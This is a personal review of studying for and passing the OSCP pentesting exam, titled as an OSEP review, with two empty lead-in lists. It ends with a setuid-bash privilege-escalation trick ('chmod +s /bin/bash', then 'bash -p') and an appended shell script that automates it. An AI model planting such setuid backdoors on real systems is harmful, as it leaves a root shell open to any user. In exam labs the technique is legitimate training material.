OSEP PEN-300 review - Evasion and Breaching Techniques
You got a reverse shell, but I got a meterpreter shell with antivirus enabled. We are not the same.
As a person who loved the concept of pentesting and how it helps you think in a very different manner, aka the 'attacker's mindset', I couldn't help but say OSCP is one of the best certifications I took as a beginner in the security field. It didn't just teach me the fundamentals to start my career in this field but also taught me a lot about time management and helped me develop critical thinking ability.
I enrolled in the PWK course somewhere in the middle of 2020 after graduating from my master's in computer forensics and cyber security. I figured this certification would cement my already existing knowledge and help me grow further with it.
As it not only served as a learning prospect but also as the beginner certification in the pentesting field, I figured it would give me good leverage for job hunting as well.
If you are a complete beginner in pentesting and OSCP is the direction you want to head, I don't recommend diving right into it, as this course requires you to be well versed in the basic fundamentals of networking and pentesting itself. Some other alternatives to start with are TryHackMe, HackTheBox, or Immersive Labs.
After completing my lab time, I managed to solve 28 lab machines. I do need to mention that PWK has one of the best lab environments to learn and understand what you are doing. It can be regarded as a treasure chest.
With the completion of the labs, I did a lot of research on resources that were suggested by community members for further practice, including TJ_Null's list. While many people said TJ_Null's list can be considered one of the best resources, I found it hard to believe, as he is an OffSec employee and they aren't really allowed to give away hints towards their exam. So I decided to just soak my feet completely in HackTheBox machines, IppSec's methodology for solving HTB machines (he has a great YouTube channel for this), and also The Cyber Mentor's ethical hacking and privilege escalation made easy courses (this guy is the Gandhi of the security community, I'd consider; without him life can be a tad tough finding layman teaching).
I also made a lot of write-ups using CherryTree for my own sake, as OSCP does require you to submit a full-fledged engagement report. This was useful for me because I could always retrace things I didn't understand and also revisit methods that I could have possibly forgotten.
Taking notes on how you solve a machine is really a good way to learn, as you grasp methodology more easily this way, and as you progressively solve more machines, there isn't really going to be a way to remember all the exploitation methods without having them stored somewhere. This really helps you during your exam as well. Cheatsheets and personal notes go a long way in the pentesting field.
Because my timezone and the dates available to schedule my exam were extremely odd, I started my exam at 3 AM. It took me roughly 11 hours to hit the passing points, with occasional breaks. This is the tough part to swallow. As great as their labs were, their exam is extremely dreadful and tough. It really takes the best out of you due to time management and thinking out of the box under limited time. It took a toll on me on most occasions, as I felt I was not able to finish it, considering external factors come into play like tiredness and what not.
After getting the passing points and coming to the report writing, I felt that if not for the exam anxiety, this exam could have been a walk in the park.
Don't be afraid to have your notes and cheatsheets up during your exam; as long as they're not the solutions for the machines (lol), you'll be totally fine, and it also keeps you from working like a headless chicken.
After submission of my report, I waited almost 1 month for my results, which till today I consider were some of the toughest days of my life. It is something I think back on and feel great about, as it was a pass on my 1st attempt too!
I would lastly like to say that even though OSCP is a beginner certification, it requires a lot of dedication and effort to pass. It takes the best out of you, and that is a great thing, as it helps you know what you need to know more about.
Also, many people don't really think OSCP is a good way to assess people for pentesting jobs, as it's more CTF-styled. I do agree to an extent, but you also need to keep in mind that this course isn't just about being a pentester; it also teaches you how to be good at what you do and how to achieve the mindset of thinking out of the box, and I consider these traits to be far more important when you're molding your career in pentesting. It cements a lot of things and provides you a really good foundation, which is almost always credited in workplaces.
I'd also like to state that falling into rabbit holes in the exam is extremely common, and this is sometimes a tough situation to be in under restricted time. What I personally like to do is enumerate things and try to check for:
As the goal of OSCP is to submit flag.txt, you can do this in many easy and also effective ways, like:
Editing your exploit code to just read the flag content for you and display it right away, or my personal favorite, where you can configure exploits with chmod +s /bin/bash and upon successful exploitation you can just run /bin/bash -p.
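To make the second trick concrete, here is an added example (not code from the original post) showing the two halves of it as small POSIX shell helpers: the payload side that sets the setuid bit, and the check you want before trusting /bin/bash -p. The caveat it encodes is that bash -p only keeps the effective uid; the bit is worthless unless the binary is also root-owned, which /bin/bash on the target is but a throwaway copy on your own box is not. The helper names and the mktemp demo are assumptions made for this example.

```shell
#!/bin/sh
# Added example: helpers around "chmod +s /bin/bash, then /bin/bash -p".
# Assumes a POSIX shell with find(1) and mktemp(1). Function names are illustrative.

# plant_suid FILE: what the exploit payload runs as root. On a real target FILE is /bin/bash.
plant_suid() {
    chmod u+s "$1"
}

# has_suid FILE: true when the setuid bit is set, regardless of who owns the file.
has_suid() {
    [ -u "$1" ]
}

# suid_shell_ready FILE: true only if FILE is root-owned AND setuid. A setuid bit on a
# file owned by a low-privilege user gives nothing: bash -p will just keep your own uid.
suid_shell_ready() {
    find "$1" -maxdepth 0 -user root -perm -4000 2>/dev/null | grep -q .
}

# suid_payload: the one-liner to embed in an exploit's command string.
suid_payload() {
    printf 'chmod +s /bin/bash'
}

# pop_shell FILE: run FILE with -p so bash keeps the effective uid instead of dropping it
# to the real uid (bash's default whenever euid != uid). Refuses when it would be pointless.
pop_shell() {
    if suid_shell_ready "$1"; then
        exec "$1" -p
    else
        echo "$1 is not a root-owned setuid binary; -p would keep your own uid" >&2
        return 1
    fi
}

# Demo on a throwaway file so it runs without root: the bit gets set, but unless you
# already are root the file is not root-owned, so pop_shell would correctly refuse.
main() {
    f=$(mktemp)
    plant_suid "$f"
    has_suid "$f" && echo "setuid bit set on $f"
    suid_shell_ready "$f" || echo "$f is not root-owned: -p would be useless here"
    rm -f "$f"
}

main "$@"
```

On the exam box the flow is: exploit runs suid_payload as root, then from your unprivileged shell pop_shell /bin/bash lands you in a root-euid bash. Check the owner with suid_shell_ready first; a bash that got copied somewhere writable and chmod'ed by a low-privilege user will pass has_suid and still get you nowhere.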